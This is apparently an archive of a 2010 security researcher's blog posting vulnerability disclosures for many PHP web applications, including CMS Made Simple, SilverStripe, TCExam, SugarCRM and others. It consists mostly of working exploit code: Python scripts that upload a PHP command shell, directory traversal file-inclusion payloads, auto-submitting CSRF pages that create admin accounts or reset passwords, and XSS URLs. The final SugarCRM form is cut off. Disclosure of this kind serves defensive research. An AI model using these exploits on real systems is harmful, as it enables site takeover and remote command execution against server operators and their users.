XSS - Cross-Site Scripting

CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload

2010-07-11T18:13:00.001-07:00

An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell.

PoC

import socket, re

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 189\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
        + re.search(u'shell_[^.]+\.php', resp).group(0)

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path

upload_shell()

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

2010-07-11T18:12:00.001-07:00

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC

import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 257\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="antzSeed"\r\n'
           '\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    s.close()

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    print 'searching or shell'

    for i in range(0, 9999):

        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(8)   
    
        s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
               'Host: ' + host + '\r\n\r\n')

        if http_ok in s.recv(8192)[:len(http_ok)]:
            print '\r\nshell located at http://' + host + shell_path
            break
        else:
            print '.',

upload_shell()

CMS Made Simple 1.8 Local File Inclusion

2010-07-11T18:11:00.000-07:00

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()

Orbis 1.0.2 Authentication Bypass

2010-07-11T08:22:00.000-07:00

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin related scripts fail to terminate after setting the header location field.

PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@

PyroCMS 0.9.9.1 Cross-site Request Forgery

2010-07-11T08:14:00.000-07:00

A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.

PoC

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
            <input type="hidden" name="first_name" value="a" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="email" value="new_admin@x.com" />
            <input type="hidden" name="username" value="new_admin" />
            <input type="hidden" name="display_name" value="a" />
            <input type="hidden" name="group" value="admin" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="confirm_password" value="Password1" />
            <input type="hidden" name="btnAction" value="save" />
        </form>
    </body>
</html>

LifeType 1.2.10 Cross-site Request Forgery

2010-07-11T08:12:00.001-07:00

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC

<html>
    <body>
        <img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
    </body>
</html>

Globber 1.4 Cross-site Request Forgery

2010-07-11T08:08:00.000-07:00

A cross-site request forgery vulnerability in Globber can be exploited
to add and delete blog posts.

PoC

<!-- Add (note that blog also must be "rebuilt") -->
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
            <input type="hidden" name="title" value="New Article" />
            <input type="hidden" name="date" value="06-07-2010 10:16 pm" />
            <input type="hidden" name="tags" value="" />
            <input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
        </form>
    </body>
</html>

<!-- Delete -->
<html>
    <body>
        <img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
    </body>
</html>

InterPhoto 2.3.0 Cross-site Request Forgery

2010-07-11T08:06:00.000-07:00

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC

<html>
    <body>
        <img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
    </body>
</html>

chillyCMS 1.1.3 Cross-site Request Forgery

2010-07-11T08:00:00.001-07:00

A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin.

PoC

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
            <input type="hidden" name="user" value="new_admin" />
            <input type="hidden" name="name" value="a" />
            <input type="hidden" name="pw" value="Password1" />
            <input type="hidden" name="pw2" value="Password1" />
            <input type="hidden" name="email" value="" />
            <input type="hidden" name="gids%5B%5D" value="1" />
            <input type="hidden" name="gids%5B%5D" value="3" />
            <input type="hidden" name="gids%5B%5D" value="4" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="language" value="en" />
            <input type="hidden" name="getnewsletter" value="1" />
            <input type="hidden" name="myaction" value="new" />
            <input type="hidden" name="action" value="updateuser" />
            <input type="hidden" name="id" value="" />
        </form>
    </body>
</html>

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

2010-07-11T07:57:00.000-07:00

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

2010-07-11T07:55:00.001-07:00

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

PeteWiki 0.6 Reflected XSS

2010-07-11T07:51:00.001-07:00

A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E

Lion Wiki 3.2.3 Reflected Cross-site Scripting

2010-07-11T07:48:00.000-07:00

A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a

NetworX 1.03 Arbitrary Upload

2010-07-05T09:39:00.002-07:00

An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell.

PoC

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/tmp/shell.php'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path

upload_shell()

nuBuilder 10.04.20 Local File Inclusion

2010-07-05T09:39:00.001-07:00

A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini

Lanius CMS 0.5.2 r1668 Cross-site Request Forgery

2010-07-05T09:38:00.002-07:00

A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.

PoC

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
            <input type="hidden" name="task" value="create" />
            <input type="hidden" name="user_id" value="" />
            <input type="hidden" name="user_name" value="a" />
            <input type="hidden" name="user_user" value="new_admin" />
            <input type="hidden" name="user_email" value="a@a.com" />
            <input type="hidden" name="user_lang" value="" />
            <input type="hidden" name="user_tz" value="" />
            <input type="hidden" name="user_gid" value="5" />
            <input type="hidden" name="user_password" value="Password1" />
            <input type="hidden" name="user_password1" value="Password1" />
        </form>
    </body>
</html>

Log1 CMS 2.0 Cross-site Request Forgery

2010-07-05T09:38:00.001-07:00

A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.

PoC

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
            <input type="hidden" name="title" value="log1 CMS" />
            <input type="hidden" name="desc" value="log1cms official page" />
            <input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
            <input type="hidden" name="language" value="0" />
            <input type="hidden" name="bgcolor" value="#ffffff" />
            <input type="hidden" name="textcolor" value="#999999" />
            <input type="hidden" name="specialcolor" value="#000000" />
            <input type="hidden" name="login" value="admin" />
            <input type="hidden" name="pass" value="Password1" />
            <input type="hidden" name="isMd5" value="1" />
            <input type="hidden" name="google_login" value="gerard.caplain" />
            <input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
            <input type="hidden" name="copyright" value="2010 by log1" />
        </form>
    </body>
</html>

ATutor 2.0 Cross-site Request Forgery

2010-07-05T09:37:00.003-07:00

A cross-site request forgery vulnerability in ATutor 2.0 can be exploited to create a new admin (new_admin/Password1).

PoC

<html>
    <body onload="document.forms[0].submit.click()">
        <form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
            <input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
            <input type="hidden" name="password_error" value="" />
            <input type="hidden" name="login" value="new_admin" />
            <input type="hidden" name="password" value="" />
            <input type="hidden" name="confirm_password" value="" />
            <input type="hidden" name="real_name" value="" />
            <input type="hidden" name="email" value="x@x.com" />
            <input type="hidden" name="priv_admin" value="1" />
            <input type="submit" name="submit" value="Save" />          
        </form>
    </body>
</html>

nuBuilder 10.04.20 Reflected XSS

2010-07-05T09:37:00.001-07:00

An XSS vulnerability in nuBuilder 10.04.20 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E

News Office 2.0.18 Reflected XSS

2010-07-05T09:36:00.003-07:00

An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

Bit Weaver 2.7 Reflected XSS

2010-07-05T09:36:00.001-07:00

An XSS vulnerability in Bit Weaver 2.7 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

odCMS 1.07 Reflected XSS

2010-07-05T09:35:00.001-07:00

An XSS vulnerability in odCMS 1.07 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

NetworX 1.0.3 Reflected XSS

2010-07-05T09:34:00.000-07:00

An XSS vulnerability in NetworX 1.0.3 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Orbis 1.0.2 Reflected XSS

2010-07-05T09:33:00.000-07:00

An XSS vulnerability in Orbis 1.0.2 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

TomatoCart 1.0 Cross-site Request Forgery

2010-07-01T20:47:00.000-07:00

A cross-site request forgery vulnerability in TomatoCart 1.0 can be exploited to create a new admin.

PoC

<html>
    <body>
        <img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" />
    </body>
</html>

Bit Weaver 2.7 Local File Inclusion

2010-07-01T17:48:00.001-07:00

A local file inclusion vulnerability in Bit Weaver 2.7 can be exploited to include arbitrary files.

PoC
http://localhost/bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini

Wiki Web Help 0.2.7 Arbitrary Upload

2010-07-01T17:47:00.000-07:00

An arbitrary upload vulnerability in Wiki Web Help 0.2.7 can be exploited to upload a PHP shell.

PoC

import sys, socket
host = 'localhost'
path = '/wwh'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/handlers/uploadimage.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'Content-Length: 194\r\n'
           'Cache-Control: max-age=0\r\n'           
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s.send('GET ' + path + '/images/shell.php HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192): print 'shell not found'        
    else: print 'shell located at ' + path + '/images/shell.php'

upload_shell()

Wiki Web Help 0.2.7 Persistent/Reflected XSS

2010-07-01T17:43:00.000-07:00

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.

PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E

SilverStripe CMS 2.4.0 Arbitrary Upload

2010-06-07T14:19:00.000-07:00

An arbitrary upload vulnerability in SilverStripe CMS 2.4.0 can be exploited to upload a PHP shell. A user account with File & Images permission is necessary to exploit this vulnerability.

PoC
Silverstripe-Shell.py

import sys, socket, re
host = '192.168.1.4'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send(request)

    resp = ''

    while 1:
        r = s.recv(8192)
        if not r: break
        resp += r
        if r[:15] == 'HTTP/1.1 302 OK': break

    s.close()

    return resp

def upload_shell():
    print 'authenticating'

    content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

    header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             '\r\n'    

    resp = send_request(header + content)

    print 'uploading shell'

    match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

    for m in match:
        if m[:9] == 'PHPSESSID':
            cookie = m

    content = '------x\r\n'\
              'Content-Disposition: form-data; name="ID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="FolderID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_doUpload"\r\n'\
              '\r\n'\
              '1\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
              'Content-Type: image/jpeg\r\n'\
              '\r\n'\
              '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_upload"\r\n'\
              '\r\n'\
              'Upload Files Listed Below\r\n'\
              '------x--\r\n'\

    header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: multipart/form-data; boundary=----x\r\n'\
             'Accept: text/html\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '\r\n'\
             '\r\n'

    resp = send_request(header + content)

    print 'grabbing ids'

    file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
    file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)    

    resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
                        'Host: ' + host + '\r\n'\
                        'Cookie: ' + cookie + '\r\n\r\n')

    print 'renaming shell'

    security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
    owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

    content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

    header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '; PastMember=1\r\n'\
             '\r\n'

    resp = send_request(header + content)   

    print 'shell located at http://' + host + path + '/assets/shell.php'

upload_shell()

TCExam 10.1.006 Arbitrary Upload

2010-06-01T20:09:00.000-07:00

An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited to upload a PHP shell.

PoC
TCExam-Shell.py

import sys, socket
host = 'localhost'
tc_exam = 'http://' + host + '/TCExam'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    content = '------x\r\n'\
              'Content-Disposition: form-data; name="sendfile0"\r\n'\
              '\r\n'\
              'shell.php\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
              'Content-Type: application/octet-stream\r\n'\
              '\r\n'\
              '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
              '------x--\r\n'\
              '\r\n'

    header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: null\r\n'\
             'Content-Type: multipart/form-data; boundary=----x\r\n'\
             'Accept: text/html\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: LastVisit=1275442604\r\n'\
             '\r\n'

    s.send(header + content)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in s.recv(8192):
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192): print 'shell not found'        
    else: print 'shell located at ' + tc_exam + '/cache/shell.php'

upload_shell()

Fiddler XSRF Inspector 1.0 Released

2010-05-30T14:09:00.000-07:00

Download

Overview
Fiddler XSRF Inspector is a plugin for Fiddler 2 that extracts cross-site request forgery attacks from HTTP requests.

Installation
Copy FiddlerXSRF.dll to the Fiddler 2 Inspectors folder, generally %ProgramFiles%\Fiddler2\Inspectors

Instructions
1) Capture the request that is going to be used to create a cross-site request forgery attack.
2) Navigate to the XSRF tab under inspectors to see the generated HTML. If the request uses the POST method, the option to convert it to GET will be available.
3) Click the Test button and observe the results.

Change Log
1.0
Initial Release

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

2010-05-30T14:02:00.000-07:00

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new admin.

PoC

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
            <input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
            <input type="hidden" name="hide_tabs_def" value="" />
            <input type="hidden" name="remove_tabs_def" value="" />
            <input type="hidden" name="module" value="Users" />
            <input type="hidden" name="record" value="" />
            <input type="hidden" name="action" value="Save" />
            <input type="hidden" name="page" value="EditView" />
            <input type="hidden" name="return_module" value="Users" />
            <input type="hidden" name="return_id" value="" />
            <input type="hidden" name="return_action" value="DetailView" />
            <input type="hidden" name="password_change" value="true" />
            <input type="hidden" name="required_password" value="1" />
            <input type="hidden" name="user_name" value="" />
            <input type="hidden" name="type" value="" />
            <input type="hidden" name="is_group" value="0" />
            <input type="hidden" name="portal_only" value="" />
            <input type="hidden" name="is_admin" value="1" />
            <input type="hidden" name="is_current_admin" value="1" />
            <input type="hidden" name="required_email_address" value="0" />
            <input type="hidden" name="sugar_user_name" value="new_admin" />
            <input type="hidden" name="unique_name" value="" />
            <input type="hidden" name="first_name" value="" />
            <input type="hidden" name="status" value="Active" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="UserType" value="Administrator" />
            <input type="hidden" name="old_password" value="" />
            <input type="hidden" name="new_password" value="Password1" />
            <input type="hidden" name="confirm_new_password" value="Password1" />
            <input type="hidden" name="emailAddressWidget" value="1" />
            <input type="hidden" name="emailAddress0" value="" />
            <input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
